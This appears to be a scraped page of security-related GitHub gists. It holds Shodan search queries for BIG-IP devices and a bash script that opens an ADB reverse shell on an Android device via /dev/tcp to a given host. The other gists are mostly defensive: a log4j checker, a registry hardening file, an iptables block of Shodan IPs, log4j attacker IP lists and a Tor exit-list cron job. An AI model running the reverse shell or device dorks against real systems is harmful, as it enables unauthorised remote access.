title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"
Vesselin Bontchev bontchev
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
| # By Random_Robbie | |
| adb connect $1:5555 | |
| adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
| echo "[*] Should have a shell now ..... Be nice :) [*]" |
byt3bl33d3r
/ log4j_rce_check.py
Created
December 10, 2021 06:02
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
jthuraisamy
/ _README.md
Last active
August 17, 2023 13:09
GospelRoom: Data Storage in UEFI NVRAM Variables
vulnersCom
/ Petya_ransomware.md
Last active
July 6, 2023 19:30
wdormann
/ disable_ddeauto.reg
Last active
June 6, 2023 09:07
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 |
jgamblin
/ antiautosploit.py
Last active
June 1, 2023 01:57
Blocks Shodan IPs From Scanning Your Servers.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import os | |
| shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"] | |
| for ip in shodan: | |
| os.system("iptables -A INPUT -s {} -j DROP".format(ip)) |
gnremy
/ CVE-2021-44228_IPs.csv
Last active
April 26, 2023 07:01
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ip | tag_name | |
|---|---|---|
| 162.155.56.106 | Apache Log4j RCE Attempt | |
| 223.111.180.119 | Apache Log4j RCE Attempt | |
| 213.142.150.93 | Apache Log4j RCE Attempt | |
| 211.154.194.21 | Apache Log4j RCE Attempt | |
| 210.6.176.90 | Apache Log4j RCE Attempt | |
| 199.244.51.112 | Apache Log4j RCE Attempt | |
| 199.101.171.39 | Apache Log4j RCE Attempt | |
| 197.246.175.186 | Apache Log4j RCE Attempt | |
| 196.196.150.38 | Apache Log4j RCE Attempt |
CJFWeatherhead
/ crontab
Created
February 16, 2018 14:20
Automatically redirect Tor traffic to onion (Hopefully efficiently as the if processing isn't intensive)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##Get New Exit Node list ever 6 Hours | |
| 57 */6 * * * `curl https://check.torproject.org/cgi-bin/TorBulkExitList.py\?ip\=<yourip> | awk '{print $0" TOREX;"}' > /etc/nginx/includes/torexit.ips && service nginx restart` |
nathanqthai
/ payload_samples.md
Last active
March 30, 2023 12:54
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence
Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.
These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.
The follow section includes Log4Shell samples seen in the wild
What appears to be a failed attempt: